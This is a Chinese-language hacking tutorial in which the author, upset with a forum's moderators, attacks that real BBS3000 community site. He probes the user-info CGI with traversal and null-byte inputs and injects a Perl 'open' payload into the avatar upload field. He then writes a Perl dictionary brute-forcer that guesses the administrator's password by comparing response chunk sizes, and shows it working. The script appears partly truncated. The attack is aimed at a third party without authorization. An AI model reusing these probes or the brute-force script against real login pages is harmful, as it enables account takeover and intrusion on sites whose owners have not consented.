一、開篇 今天閑著無(wú)聊，到本地區(qū)的一個(gè)社區(qū)上轉(zhuǎn)轉(zhuǎn)，那些人污言穢語(yǔ)的，有個(gè)帖子還侵犯了一個(gè)朋友的版權(quán)，跟貼說(shuō)了那人幾句，管理員也不管，實(shí)在看不下去了，打算給管理員盆冷水清醒清醒。
二、準(zhǔn)備/分析 安全第一，先開個(gè)HTTP代理，打開社區(qū)的登陸頁(yè)面，看到上面顯示的URL是：http://www.****bbs.com/login.cgi 打開頁(yè)面的源代碼，找到登陸的關(guān)鍵幾句： <form action="login.cgi" method="post">
<input type="hidden" name="menu" value="login">
<input type="hidden" name="id" value="">
用戶名：<input size="25" name="username" class="i06">
密　碼：<input type="password" size="25" value name="userpsd" class="i06">
</form> 所以，提交登陸信息的URL應(yīng)該是http://wwww.****bbs.com/login.cgi?username=ID&userpsd=PWD&menu=login&id=
習(xí)慣先查看用戶信息，因?yàn)橐话闱闆r下用戶名和密碼都是緊連著保存在一起的，在這里我們更容易接近我們想要的信息。提交如下URL查看silkroad用戶信息： http://www.****bbs.com/yhreg.cgi?menu=viewuser&username=silkroad 返回正常用戶信息
http://www.****bbs.com/yhreg.cgi?menu=viewuser&username=./silkroad 同樣返回正常用戶信息，看來(lái).和/已經(jīng)被過(guò)濾掉了
http://www.****bbs.com/yhreg.cgi?menu=viewuser&username=silkroad\0 提示此用戶沒(méi)有被注冊(cè) ：（
掃描看看，有FTP弱口令~可惜是anonymous，價(jià)值不大。
回到CGI上，只在http://www.****bbs.com/rank.cgi這上面發(fā)現(xiàn)用的是Yuzi的BBS3000。下面也可以下載BBS3000分析源代碼，但比較費(fèi)時(shí)間，我們先到幾處敏感的地方看看， http://www.****bbs.com/photo.cgi可以上傳頭像。 由于頭像的顯示是 <img src=***></img> 關(guān)鍵就在***這里，即圖片的連接。在要上傳的頭像的輸入欄中填入
</img>qq~;open F,">the0crat.txt";<img src=>.gif 試試，提交，沒(méi)有任何提示，程序也沒(méi)對(duì)圖片進(jìn)行任何改變。
換個(gè)角度來(lái)看，既不分析源代碼，也不入侵目標(biāo)服務(wù)器，那么還是來(lái)試試探測(cè)探測(cè)社區(qū)管理員的密碼，難說(shuō)我今天運(yùn)氣比較好 ：） 當(dāng)然社區(qū)上的管理員也不會(huì)是白癡，不會(huì)設(shè)個(gè)空密碼等你去玩。提到探測(cè)論壇ID的密碼，大家首先想到的是什么？下載個(gè)又大又沒(méi)趣的黑客軟件來(lái)掛個(gè)字典？難道就沒(méi)有點(diǎn)想要自己動(dòng)手寫一個(gè)腳本來(lái)破密碼的沖動(dòng)？嘿嘿。現(xiàn)在就教你自己動(dòng)手一步一步來(lái)對(duì)密碼進(jìn)行探測(cè) ：）
密碼探測(cè)的一般方法是： ①取得預(yù)進(jìn)行猜測(cè)的密碼列表 | | | ②向目標(biāo)依次提交密碼 <--------- | | | | | | ③根據(jù)目標(biāo)的響應(yīng)判斷密碼是否正確 | | | | | | | | | | 密碼正確 密碼錯(cuò)誤 | | | | | | | | | | 返回給用戶密碼 Next-----------------
第三步要繞個(gè)圈子，其他的幾步用程序就能很簡(jiǎn)單的實(shí)現(xiàn)。 所以先從第三步開始： 我不了解別的那些程序是怎么進(jìn)行判斷的，估計(jì)是先取得成功登陸和密碼錯(cuò)誤的兩個(gè)頁(yè)面的代碼，然后對(duì)比它們的不同點(diǎn)，可能還有別的辦法，可我還沒(méi)想到~~~：） 所以，首先注冊(cè)個(gè)ID，帳號(hào)asdfasdf，密碼asdfasdf，根據(jù)前面取得的信息，此ID提交的URL為http://www.****bbs.com/login.cgi?username=asdfasdf&userpsd=asdfasdf&menu=login&id=，"username="這后面的是用戶ID，"userpsd="這后面是用戶密碼，然后登出社區(qū) 現(xiàn)在用telnet去取得我們想要的信息： F:\>nc -vv www.****bbs.com 80 <<<-----用nc連接目標(biāo)WEB服務(wù)的端口，別說(shuō)你不知道nc是什么，嘿嘿
Warning: inverse host lookup failed for ***.***.***.***: h_errno 11004: NO_DATA
www.****bbs.com [***.***.***.***] 80 (http) open
GET http://www.****bbs.com/login.cgi?username=asdfasdf&userpsd=error&menu=login&id= HTTP/1.1 <Enter>
<<<-------這里用到前面提到的提交用戶登陸信息的URL，但用的是錯(cuò)誤密碼
host:iis-server <Enter><Enter>
HTTP/1.1 200 OK
Date: Mon, 18 Aug 2003 11:59:41 GMT
Server: Apache/1.3.26 (Unix) PHP/4.0.6
Transfer-Encoding: chunked
Content-Type: text/html
fe7<<<------------注意這個(gè)
<html>
<head>
<meta http-equiv=Content-Type content=text/html; charset=gb2312>
<link REL="SHORTCUT ICON" href=http://www.****bbs.com/pic/ybb.ico>
...... 這個(gè)是非成功登陸后返回的信息，再來(lái)： F:\>nc -vv www.****bbs.com 80
Warning: inverse host lookup failed for ***.***.***.***: h_errno 11004: NO_DATA
www.****bbs.com [***.***.***.***] 80 (http) open
GET http://www.****bbs.com/login.cgi?username=asdfasdf&userpsd=asdfasdf&menu=login&id= HTTP/1.1
<<<-------這次用的是正確的密碼
host:iis-server
HTTP/1.1 200 OK
Date: Mon, 18 Aug 2003 12:09:43 GMT
Server: Apache/1.3.26 (Unix) PHP/4.0.6
Transfer-Encoding: chunked
Content-Type: text/html
18d <<<------------注意這個(gè)
<html><head><meta http-equiv=Content-Type content=text/html; charset=gb2312>
<SCRIPT>
expireDate=new Date;
expireDate.setYear(expireDate.getYear() 1);
...... 這個(gè)是成功登陸后返回的信息，返回的信息的第七行"fe7"和"18d"不同，我們就從這里下手。
現(xiàn)在到社區(qū)的管理團(tuán)隊(duì)上看看管理員的ID，其中一個(gè)管理員的ID是“秘密”。
三、程序代碼/代碼解析 思路（步驟）： 取得IP ---> 打開字典，字典里每一行一個(gè)密碼 ---> socket() ---> connect() ---> 向目標(biāo)主機(jī)WEB端口提交數(shù)據(jù)，此數(shù)據(jù)中所提交的密碼用一個(gè)變量來(lái)代替，這個(gè)變量就是字典里的密碼 ---> 將返回的信息保存，用先前提到的登陸成功/失敗返回信息的不同點(diǎn)進(jìn)行對(duì)比，判斷是否登陸成功，即密碼是否正確 ---> [ 當(dāng)前密碼正確--->輸出正確的密碼并退出程序; 當(dāng)前密碼錯(cuò)誤--->從第二步驟開始重復(fù)，直到密碼正確或試完字典里的所有密碼 ] #提交的信息
my @res=sendraw($req);#將目標(biāo)服務(wù)器返回的信息保存為數(shù)組
if($res[6]=~/fe7/g) #從@res數(shù)組中取得所返回信息的第7行，并進(jìn)行判斷。
判斷依據(jù)：前文中用telnet所獲知的用來(lái)判斷密碼是否正確的字符
{print "\npwd:$pwd error";}#如果返回的信息中的第7行中包含fe7這三個(gè)
字符，則在屏幕上打印出密碼錯(cuò)誤的信息
else
{
print "\npwd:$pwd passed";#因?yàn)槌晒Φ顷懞蠓祷氐男畔⒅械牡?行不包
含fe7這三個(gè)字符，所以如果第7行中不包含fe7這三個(gè)字符就表示登陸成功，
即密碼正確
close(FH);
exit;#探測(cè)到正確密碼立刻退出
}
}#對(duì)比判斷是否登陸成功的循環(huán)
close(FH);
sub sendraw {
my ($req2) = @_;
my $target;
$target = inet_aton($host) or die "\ninet_aton problems";#轉(zhuǎn)換目標(biāo)IP
socket(Handle,PF_INET,SOCK_STREAM,getprotobyname(’tcp’)||0) or die "\nSocket problems\n";#Socket
if(connect(Handle,pack "SnA4x8",2,80,$target)){#此例中為80端口，
根據(jù)實(shí)際情況更改
select(Handle);
$| = 1;
print $req2;#向目標(biāo)服務(wù)器提交登陸資料
my @res2 = <Handle>;#取得目標(biāo)服務(wù)器返回的信息
select(STDOUT);
close(Handle);
return @res2;#將目標(biāo)服務(wù)器返回的信息作為sendraw()函數(shù)的返回值
}
else {
die("\nCan’t connect to $host:80...\n");
}
}
四、演示 dic.dic內(nèi)容如下：
asdf
asdfasdf
asdfa
運(yùn)行這個(gè)腳本(win2k activeperl5.6下通過(guò))
C:\>cracker.pl www.****bbs.com
Sending...
pwd:asdf error
pwd:asdfasdf passed 程序探測(cè)到正確密碼后退出...：）
注意要根據(jù)實(shí)際情況更改提交的信息和判斷依據(jù)，以及WEB端口。
掛個(gè)字典，就可以慢慢等密碼出來(lái)了，然而更多時(shí)候是取決于你的運(yùn)氣。
五、總結(jié) 弊：這段代碼用的是單線程，所以在探測(cè)的速度上不是很理想，有興趣的可以去改改，在沒(méi)有使用跳板的情況下對(duì)自己不安全，而且成功率很大程度上取決于你的運(yùn)氣。 利：這種方法比較有效, 但也是比較沒(méi)有效率的密碼破解方式。

版權(quán)聲明：本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái)，僅供學(xué)習(xí)參考，不代表本站立場(chǎng)，如有內(nèi)容涉嫌侵權(quán)，請(qǐng)聯(lián)系alex-e#qq.com處理。